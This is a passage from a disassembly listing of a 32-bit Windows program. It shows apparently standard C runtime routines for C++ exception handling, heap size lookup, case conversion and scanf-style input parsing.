; ---------------------------------------------------------------------------
loc_41AFB1: ; CODE XREF: sub_41AF25+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41AF25 endp
; =============== S U B R O U T I N E =======================================
sub_41AFC3 proc near ; CODE XREF: sub_41AF25+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41AFD4
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AFD4: ; CODE XREF: sub_41AFC3+C�j
jmp sub_41B42C
sub_41AFC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AFD9 proc near ; CODE XREF: sub_41AC79+151�p
; sub_41AE20+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41AFFB
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41B18A
add esp, 10h
loc_41AFFB: ; CODE XREF: sub_41AFD9+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41B007
push edi
jmp short loc_41B00A
; ---------------------------------------------------------------------------
loc_41B007: ; CODE XREF: sub_41AFD9+29�j
push [ebp+arg_24]
loc_41B00A: ; CODE XREF: sub_41AFD9+2C�j
call sub_415F5C
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41AF25
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41B054
add esp, 2Ch
test eax, eax
jz short loc_41B04F
push edi
push eax
call sub_415F1A
loc_41B04F: ; CODE XREF: sub_41AFD9+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41AFD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B054 proc near ; CODE XREF: sub_41AFD9+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421838
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, dword_46BB80
mov [ebp+var_1C], ecx
mov ecx, dword_46BB84
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov dword_46BB80, edi
mov ecx, [ebp+arg_8]
mov dword_46BB84, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_415FE1
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41B11A
mov eax, [ebp+var_2C]
loc_41B0E1: ; CODE XREF: sub_41B0FA+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B054 endp
; =============== S U B R O U T I N E =======================================
sub_41B0F0 proc near ; DATA XREF: .text:00421848�o
push dword ptr [ebp-14h]
call sub_41B160
pop ecx
retn
sub_41B0F0 endp
; =============== S U B R O U T I N E =======================================
sub_41B0FA proc near ; DATA XREF: .text:0042184C�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_416242
pop ecx
pop ecx
xor eax, eax
jmp short loc_41B0E1
sub_41B0FA endp
; ---------------------------------------------------------------------------
loc_41B112: ; DATA XREF: .text:00421840�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_41B11A proc near ; CODE XREF: sub_41B054+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov dword_46BB80, eax
mov eax, [ebp-20h]
mov dword_46BB84, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41B15F
cmp dword ptr [edi+10h], 3
jnz short locret_41B15F
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41B15F
cmp [ebp-24h], ebx
jnz short locret_41B15F
cmp [ebp-2Ch], ebx
jz short locret_41B15F
call sub_4162AA
push eax
push edi
call sub_41B34E
pop ecx
pop ecx
locret_41B15F: ; CODE XREF: sub_41B11A+1C�j
; sub_41B11A+22�j ...
retn
sub_41B11A endp
; =============== S U B R O U T I N E =======================================
sub_41B160 proc near ; CODE XREF: sub_41B0F0+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41B187
cmp dword ptr [eax+10h], 3
jnz short loc_41B187
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41B187
cmp dword ptr [eax+1Ch], 0
jnz short loc_41B187
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B187: ; CODE XREF: sub_41B160+C�j
; sub_41B160+12�j ...
xor eax, eax
retn
sub_41B160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B18A proc near ; CODE XREF: sub_41AFD9+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421850
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41B333
cmp byte ptr [eax+8], 0
jz loc_41B333
mov eax, [ecx+8]
test eax, eax
jz loc_41B333
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41B227
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_41E802
pop ecx
pop ecx
test eax, eax
jz loc_41B32A
push 1
push edi
call sub_41E81E
pop ecx
pop ecx
test eax, eax
jz loc_41B32A
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41B218: ; CODE XREF: sub_41B18A+F5�j
push eax
call sub_41B3B5
pop ecx
pop ecx
mov [edi], eax
jmp loc_41B32F
; ---------------------------------------------------------------------------
loc_41B227: ; CODE XREF: sub_41B18A+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41B281
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_41E802
pop ecx
pop ecx
test eax, eax
jz loc_41B32A
push 1
push edi
call sub_41E81E
pop ecx
pop ecx
test eax, eax
jz loc_41B32A
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_416320
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41B32F
mov eax, [edi]
test eax, eax
jz loc_41B32F
add esi, 8
push esi
jmp short loc_41B218
; ---------------------------------------------------------------------------
loc_41B281: ; CODE XREF: sub_41B18A+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_41B2C9
call sub_41E802
pop ecx
pop ecx
test eax, eax
jz loc_41B32A
push 1
push edi
call sub_41E81E
pop ecx
pop ecx
test eax, eax
jz short loc_41B32A
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41B3B5
pop ecx
pop ecx
push eax
push edi
call sub_416320
add esp, 0Ch
jmp short loc_41B32F
; ---------------------------------------------------------------------------
loc_41B2C9: ; CODE XREF: sub_41B18A+103�j
call sub_41E802
pop ecx
pop ecx
test eax, eax
jz short loc_41B32A
push 1
push edi
call sub_41E81E
pop ecx
pop ecx
test eax, eax
jz short loc_41B32A
push dword ptr [esi+18h]
call sub_41E83A
pop ecx
test eax, eax
jz short loc_41B32A
test byte ptr [esi], 4
jz short loc_41B310
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41B3B5
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_415F55
jmp short loc_41B32F
; ---------------------------------------------------------------------------
loc_41B310: ; CODE XREF: sub_41B18A+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41B3B5
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_415F4E
jmp short loc_41B32F
; ---------------------------------------------------------------------------
loc_41B32A: ; CODE XREF: sub_41B18A+6A�j
; sub_41B18A+7C�j ...
call sub_41B482
loc_41B32F: ; CODE XREF: sub_41B18A+98�j
; sub_41B18A+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41B333: ; CODE XREF: sub_41B18A+2E�j
; sub_41B18A+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B18A endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41B42C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B34E proc near ; CODE XREF: sub_41AC79+170�p
; sub_41B11A+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421860
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41B395
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41B395
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_415F4E
or [ebp+var_4], 0FFFFFFFFh
loc_41B395: ; CODE XREF: sub_41B34E+2A�j
; sub_41B34E+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B34E endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41B42C
; =============== S U B R O U T I N E =======================================
sub_41B3B5 proc near ; CODE XREF: sub_41B18A+8F�p
; sub_41B18A+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41B3D6
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41B3D6: ; CODE XREF: sub_41B3B5+12�j
pop esi
retn
sub_41B3B5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3E0 proc near ; CODE XREF: sub_415FE1+40�p
; sub_41AF25+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_4162CD
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41B41F
mov ecx, 2
loc_41B41F: ; CODE XREF: sub_41B3E0+38�j
push ecx
call sub_4162CD
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41B3E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B42C proc near ; CODE XREF: sub_41AC79:loc_41AE1B�j
; sub_41AFC3:loc_41AFD4�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041E852 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421870
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, dword_46BB8C
test eax, eax
jz short loc_41B474
mov [ebp+var_4], 1
call eax
jmp short loc_41B470
; ---------------------------------------------------------------------------
loc_41B469: ; DATA XREF: .text:00421880�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B46D: ; DATA XREF: .text:00421884�o
mov esp, [ebp+var_18]
loc_41B470: ; CODE XREF: sub_41B42C+3B�j
and [ebp+var_4], 0
loc_41B474: ; CODE XREF: sub_41B42C+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41B47D: ; DATA XREF: .text:00421878�o
jmp loc_41E852
sub_41B42C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B482 proc near ; CODE XREF: sub_416183+23�p
; sub_416183:loc_4161EE�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421888
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_43A774
test eax, eax
jz short loc_41B4CA
mov [ebp+var_4], 1
call eax ; sub_41B42C
jmp short loc_41B4C6
; ---------------------------------------------------------------------------
loc_41B4BF: ; DATA XREF: .text:00421898�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_41B4C6: ; CODE XREF: sub_41B482+3B�j
and [ebp+var_4], 0
loc_41B4CA: ; CODE XREF: sub_41B482+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41B4D3: ; DATA XREF: .text:00421890�o
jmp sub_41B42C
sub_41B482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B4D8 proc near ; CODE XREF: sub_416663+7�p
; sub_416663+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_46D168
push esi
cmp eax, 3
jnz short loc_41B501
mov esi, [ebp+arg_0]
push esi
call sub_418CBD
test eax, eax
pop ecx
jz short loc_41B4FE
mov eax, [esi-4]
sub eax, 9
jmp short loc_41B536
; ---------------------------------------------------------------------------
loc_41B4FE: ; CODE XREF: sub_41B4D8+1C�j
push esi
jmp short loc_41B528
; ---------------------------------------------------------------------------
loc_41B501: ; CODE XREF: sub_41B4D8+E�j
cmp eax, 2
jnz short loc_41B525
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_419A18
add esp, 0Ch
test eax, eax
jz short loc_41B525
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_41B536
; ---------------------------------------------------------------------------
loc_41B525: ; CODE XREF: sub_41B4D8+2C�j
; sub_41B4D8+43�j
push [ebp+arg_0]
loc_41B528: ; CODE XREF: sub_41B4D8+27�j
push 0
push dword_46D164
call dword_42118C ; RtlSizeHeap
loc_41B536: ; CODE XREF: sub_41B4D8+24�j
; sub_41B4D8+4B�j
pop esi
leave
retn
sub_41B4D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B539 proc near ; CODE XREF: sub_416728+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_46BB9C, 0
push ebx
jnz short loc_41B564
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41B602
cmp eax, 7Ah
jg loc_41B602
sub eax, 20h
jmp loc_41B602
; ---------------------------------------------------------------------------
loc_41B564: ; CODE XREF: sub_41B539+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41B597
cmp dword_4385FC, 1
jle short loc_41B584
push 2
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41B58F
; ---------------------------------------------------------------------------
loc_41B584: ; CODE XREF: sub_41B539+3D�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 2
loc_41B58F: ; CODE XREF: sub_41B539+49�j
test eax, eax
jnz short loc_41B597
loc_41B593: ; CODE XREF: sub_41B539+AF�j
mov eax, ebx
jmp short loc_41B602
; ---------------------------------------------------------------------------
loc_41B597: ; CODE XREF: sub_41B539+34�j
; sub_41B539+58�j
mov edx, off_4383F0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41B5BA
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41B5C3
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B539+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41B5C3: ; CODE XREF: sub_41B539+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_46BB9C
call sub_41C639
add esp, 20h
test eax, eax
jz short loc_41B593
cmp eax, 1
jnz short loc_41B5F5
movzx eax, [ebp+var_4]
jmp short loc_41B602
; ---------------------------------------------------------------------------
loc_41B5F5: ; CODE XREF: sub_41B539+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41B602: ; CODE XREF: sub_41B539+14�j
; sub_41B539+1D�j ...
pop ebx
leave
retn
sub_41B539 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B605 proc near ; CODE XREF: sub_416947+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41C00B
mov edi, [ebp+arg_0]
jmp short loc_41B634
; ---------------------------------------------------------------------------
loc_41B62F: ; CODE XREF: sub_41B605+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41B634: ; CODE XREF: sub_41B605+28�j
cmp dword_4385FC, 1
jle short loc_41B64C
movzx eax, al
push 8
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_41B65B
; ---------------------------------------------------------------------------
loc_41B64C: ; CODE XREF: sub_41B605+36�j
mov ecx, off_4383F0
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41B65B: ; CODE XREF: sub_41B605+45�j
cmp eax, ebx
jz short loc_41B695
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41C092
pop ecx
pop ecx
push eax
call sub_41C07B
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41E931
add esp, 0Ch
loc_41B683: ; CODE XREF: sub_41B605+8E�j
test eax, eax
jz short loc_41B695
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41E931
pop ecx
jmp short loc_41B683
; ---------------------------------------------------------------------------
loc_41B695: ; CODE XREF: sub_41B605+58�j
; sub_41B605+80�j
cmp byte ptr [esi], 25h
jnz loc_41BF77
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41B6CC: ; CODE XREF: sub_41B605+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_4385FC, 1
jle short loc_41B6E9
movzx eax, bl
push 4
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_41B6F8
; ---------------------------------------------------------------------------
loc_41B6E9: ; CODE XREF: sub_41B605+D3�j
mov ecx, off_4383F0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41B6F8: ; CODE XREF: sub_41B605+E2�j
test eax, eax
jz short loc_41B70E
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B70E: ; CODE XREF: sub_41B605+F5�j
cmp ebx, 4Eh
jg short loc_41B751
jz short loc_41B773
cmp ebx, 2Ah
jz short loc_41B74C
cmp ebx, 46h
jz short loc_41B773
cmp ebx, 49h
jz short loc_41B72E
cmp ebx, 4Ch
jnz short loc_41B760
inc [ebp+var_D]
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B72E: ; CODE XREF: sub_41B605+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41B760
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41B760
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B74C: ; CODE XREF: sub_41B605+113�j
inc [ebp+var_E]
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B751: ; CODE XREF: sub_41B605+10C�j
cmp ebx, 68h
jz short loc_41B76D
cmp ebx, 6Ch
jz short loc_41B765
cmp ebx, 77h
jz short loc_41B768
loc_41B760: ; CODE XREF: sub_41B605+122�j
; sub_41B605+12D�j ...
inc [ebp+var_F]
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B765: ; CODE XREF: sub_41B605+154�j
inc [ebp+var_D]
loc_41B768: ; CODE XREF: sub_41B605+159�j
inc [ebp+var_5]
jmp short loc_41B773
; ---------------------------------------------------------------------------
loc_41B76D: ; CODE XREF: sub_41B605+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41B773: ; CODE XREF: sub_41B605+107�j
; sub_41B605+10E�j ...
cmp [ebp+var_F], 0
jz loc_41B6CC
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41B798
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41B798: ; CODE XREF: sub_41B605+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41B7B6
mov al, [esi]
cmp al, 53h
jz short loc_41B7B2
cmp al, 43h
jz short loc_41B7B2
or [ebp+var_5], 0FFh
jmp short loc_41B7B6
; ---------------------------------------------------------------------------
loc_41B7B2: ; CODE XREF: sub_41B605+1A1�j
; sub_41B605+1A5�j
mov [ebp+var_5], 1
loc_41B7B6: ; CODE XREF: sub_41B605+19B�j
; sub_41B605+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41B7EF
cmp esi, 63h
jz short loc_41B7E0
cmp esi, 7Bh
jz short loc_41B7E0
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41C092
pop ecx
jmp short loc_41B7EB
; ---------------------------------------------------------------------------
loc_41B7E0: ; CODE XREF: sub_41B605+1C5�j
; sub_41B605+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
loc_41B7EB: ; CODE XREF: sub_41B605+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41B7EF: ; CODE XREF: sub_41B605+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41B7FF
cmp [ebp+var_C], eax
jz loc_41BFDB
loc_41B7FF: ; CODE XREF: sub_41B605+1EF�j
cmp esi, 6Fh
jg loc_41BA66
jz loc_41BD18
cmp esi, 63h
jz loc_41BA43
cmp esi, 64h
jz loc_41BD18
jle loc_41BA90
cmp esi, 67h
jle short loc_41B863
cmp esi, 69h
jz short loc_41B84B
cmp esi, 6Eh
jnz loc_41BA90
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41BF46
jmp loc_41BF6C
; ---------------------------------------------------------------------------
loc_41B84B: ; CODE XREF: sub_41B605+229�j
push 64h
pop esi
loc_41B84E: ; CODE XREF: sub_41B605+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41BAD8
mov [ebp+var_17], 1
jmp loc_41BADD
; ---------------------------------------------------------------------------
loc_41B863: ; CODE XREF: sub_41B605+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41B87F
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41B884
; ---------------------------------------------------------------------------
loc_41B87F: ; CODE XREF: sub_41B605+26A�j
cmp ebx, 2Bh
jnz short loc_41B89B
loc_41B884: ; CODE XREF: sub_41B605+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B89E
; ---------------------------------------------------------------------------
loc_41B89B: ; CODE XREF: sub_41B605+27D�j
mov edi, [ebp+arg_0]
loc_41B89E: ; CODE XREF: sub_41B605+294�j
cmp [ebp+var_20], 0
jz short loc_41B8AD
cmp [ebp+var_C], 15Dh
jle short loc_41B8B4
loc_41B8AD: ; CODE XREF: sub_41B605+29D�j
mov [ebp+var_C], 15Dh
loc_41B8B4: ; CODE XREF: sub_41B605+2A6�j
; sub_41B605+2F2�j
cmp dword_4385FC, 1
jle short loc_41B8C9
push 4
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41B8D4
; ---------------------------------------------------------------------------
loc_41B8C9: ; CODE XREF: sub_41B605+2B6�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 4
loc_41B8D4: ; CODE XREF: sub_41B605+2C2�j
test eax, eax
jz short loc_41B8F9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B8F9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B8B4
; ---------------------------------------------------------------------------
loc_41B8F9: ; CODE XREF: sub_41B605+2D1�j
; sub_41B605+2DB�j
cmp byte_438600, bl
jnz short loc_41B967
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B967
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
mov al, byte_438600
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41B922: ; CODE XREF: sub_41B605+360�j
cmp dword_4385FC, 1
jle short loc_41B937
push 4
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41B942
; ---------------------------------------------------------------------------
loc_41B937: ; CODE XREF: sub_41B605+324�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 4
loc_41B942: ; CODE XREF: sub_41B605+330�j
test eax, eax
jz short loc_41B967
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B967
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B922
; ---------------------------------------------------------------------------
loc_41B967: ; CODE XREF: sub_41B605+2FA�j
; sub_41B605+304�j ...
cmp [ebp+var_1C], 0
jz loc_41B9FF
cmp ebx, 65h
jz short loc_41B97F
cmp ebx, 45h
jnz loc_41B9FF
loc_41B97F: ; CODE XREF: sub_41B605+36F�j
mov eax, [ebp+var_C]
